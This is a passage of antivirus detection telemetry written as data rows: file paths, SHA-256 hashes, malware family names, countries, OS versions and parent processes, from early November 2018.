  Row(detection=Row(filename='avscan-20181104-210712-6b906423', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5129c324\\AVSCAN-20181104-210448-584E1AA5\\AVSCAN-20181104-210712-6B906423', filesize=320000, name='TR/AD.CoinMiner.xxwsa.#M1.#R1'), hash='ced46d99ebf179274add883a3e6a7ad3c3ecf4cd739ea540de0f7a8c9bd3c44b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:07:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-121045-3dc9baf8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e88e3502\\AVSCAN-20181104-120819-2B50EA56\\AVSCAN-20181104-121045-3DC9BAF8', filesize=576000, name='HEUR/APC.#M1.#R1'), hash='b7f73bc60f85498239623ee42831c8032e8f89ee0a9f0f2939079c2bbb5b47dc', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:10:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202521-d624fe6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202521-D624FE6D', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:25:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='115059913.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\115059913.exe', filesize=35056000, name='WORM/Alien.uqiib.#M1.#R1'), hash='c7ac889a8307930552202d90b7871bbaf0f0ed667230632d69dc2b994c033383', metadata=Row(cmdline='\\\\\\/DB', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-04T03:51:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202504-d3e4929a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202504-D3E4929A', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:25:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023dd20', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023dd20', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:52:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lust_and_power.exe', filepath='D:\\моя\\Новая папка (10)\\Lust and Power\\[RUS] Lust_and_Power-1.2.b-pc\\Lust_and_Power.exe', filesize=128000, name='TR/Crypt.ZPACK.Gen.#M300.#R2504'), hash='f944b967950e2a63ae409719695c20f479ac847d801faab7805e0b867f7a6781', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-04T08:12:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:01:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-123334-1b00fdfb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6e76b678\\AVSCAN-20181104-123246-0FB1FA9A\\AVSCAN-20181104-123334-1B00FDFB', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T03:33:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141448-38b5ae38', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-141440-37DF93DA\\AVSCAN-20181104-141448-38B5AE38', filesize=576000, name='HEUR/AGEN.1024193.#M1.#R1'), hash='e09fe8e3221df750b702208420ad6f8fdc11241bd1726488d87ef4e10ae6380b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:15:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='$r6q6ust.exe', filepath='C:\\$Recycle.Bin\\S-1-5-21-51707995-2256450374-1484956166-1001\\$R6Q6UST.exe', filesize=384000, name='DR/Delphi.Gen.#M300.#R273'), hash='fe4029696947def84af9e7b0df0557224dd01413779c35c1cd51941193ffa789', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4473304, timestamp='2018-11-04T08:07:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00251eba', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00251eba', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:35:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cttunesvr.exe', filepath='\\\\?\\C:\\Windows\\System32\\cttunesvr.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='fcfc777ded4da2b405a0b7017de2cd22d9e6e6787a295f7c5704605dad5f6814', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fdfdf7fdba20713fff6ce3fc3f40bc19d3944c51017887291a84bcb28083cd42', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FDFDF7FDBA20713FFF6CE3FC3F40BC19D3944C51017887291A84BCB28083CD42', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='fdfdf7fdba20713fff6ce3fc3f40bc19d3944c51017887291a84bcb28083cd42', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:45:52Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-07-08-23.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T01:19:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:31:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Program Files (x86)\\ProKAward\\wap.exe', filesize=4096000, name='TR/SPY.25270.1.#M1.#R1'), hash='1d0715a5b5f757f80135adf6b24c369817c2d7c31b1717bc980ed7ea7c1a6057', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='need for speed the run.exe', filepath='C:\\Program Files (x86)\\Need For Speed The Run\\Need For Speed The Run.exe', filesize=7808000, name='W32/Virut.Gen.#M1.#R1'), hash='6b29dfb7c7c4dfe2919e997510c9d39000b5c56ec90113d7067ffecba1619c65', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T08:01:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='atube_catcher_2506595951.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\aTube_Catcher_2506595951.exe', filesize=2460000, name='PUA/InstallCore.#M1.#R1'), hash='62baa352039830f5fd30eb37497b849a646d678db29466333ac2a0c43fdda658', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:25:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6a46105ce6c5715cb66fd699308dadd2463b29911a5bde6738f4c82f64d45177', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6A46105CE6C5715CB66FD699308DADD2463B29911A5BDE6738F4C82F64D45177', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='6a46105ce6c5715cb66fd699308dadd2463b29911a5bde6738f4c82f64d45177', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:48:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\PROGRAM FILES\\AVIRA\\ANTIVIRUS\\AVIRASECURITYCENTERAGENT.EXE', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/LOGFILE=\\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Avira\\\\\\\\Antivirus\\\\\\\\LOGFILES\\\\\\\\AviraSecurityCenterAgent-2018-11-02-07-05-09.log\\\\\\" \\\\\\/LOGLEVEL=\\\\\\"STANDARD\\\\\\" \\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-22T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpschd.dll Cyclic Check\\\\\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', parentsize=840000, timestamp='2018-11-02T22:45:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-080029-3ec687db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4445c0e1\\AVSCAN-20181102-075759-2E42F5CA\\AVSCAN-20181102-080029-3EC687DB', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:00:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-233521-50c1060e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a62e4262\\AVSCAN-20181102-233231-316EF32D\\AVSCAN-20181102-233521-50C1060E', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:35:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='netinfoplugin.dll', filepath='C:\\Program Files\\3G ALWA\\NetInfoPlugin.dll', filesize=324000, name='W32/Ramnit.C.#M1.#R1'), hash='1d18f09189c3ad3998ccac4c4b6778b39f3757af0a1ceaf1c5f0859274b20c16', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T14:42:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='soldatenspiel-ultimatebot-v006rar.exe', filepath='H:\\SOLDATENSPIEL-ULTIMATEBOT-V006RAR.EXE', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='2e4ed3a37739b247a9a395139983a0fbd87c450b1043f7cb7002136608c2c585', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T13:58:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T00:09:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101851-954231de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-101851-954231DE', filesize=64000, name='TR/Agent.64000.101.#M1.#R1'), hash='28d02d53172d5486e395b7cc2768e91b922defe83fe554f97d652a3879527a70', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:18:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-17-42-00.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-28T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T15:47:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='abjpnskqfld24h.x64.dll#519cc5b4c2d973d2', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\v1\\20181101.172246\\237\\UNIDEALSI\\ABJPnSkqFLD24h.x64.dll#519CC5B4C2D973D2', filesize=704000, name='ADWARE/MultiPlug.Gen4.#M300.#R300238'), hash='64845defd63415cf5572bfec650e2c125828a8d2ba9aad19ecf4ef227bb78fbb', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:09:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='islandsf.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\ISLANDSF\\ISLANDSF.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='_default.pif:mupygh', filepath='E:\\alte Sicherungen allgemein 27.08.2011\\alteSachen\\altercomp\\WINDOWS\\_default.pif:mupygh', filesize=64000, name='TR/Lefeat.DLL1.#M1.#R1'), hash='2c1b2010dddfa99a40da5cee2b70bb72bacb274c692b7e53e3aac2360c759311', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T12:29:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.564\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.564\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T04:45:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='aam registration notifier.exe', filepath='C:\\Program Files (x86)\\Common Files\\Adobe\\OOBE\\PDApp\\P7\\AAM Registration Notifier.exe', filesize=444000, name='W32/Neshta.A.#M1.#R1'), hash='47c2a29f3f9e7e7733bee9a945bf13239d8f2e528a85476c7cd44219a983c72a', metadata=Row(cmdline='\\\\\\/c', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe', parentsize=194640, timestamp='2018-11-02T03:51:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T08:42:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3da6a886cf0fc08e2220e476bb8d9c401f2b87708731457dbeba7bbecab87d5c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\3DA6A886CF0FC08E2220E476BB8D9C401F2B87708731457DBEBA7BBECAB87D5C', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='3da6a886cf0fc08e2220e476bb8d9c401f2b87708731457dbeba7bbecab87d5c', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:00:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182144-a15f02a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_98d4435e\\AVSCAN-20181102-181915-8E4EB9F0\\AVSCAN-20181102-182144-A15F02A9', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T10:21:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:43Z'), dt=datetime.date(2018, 11, 2)),
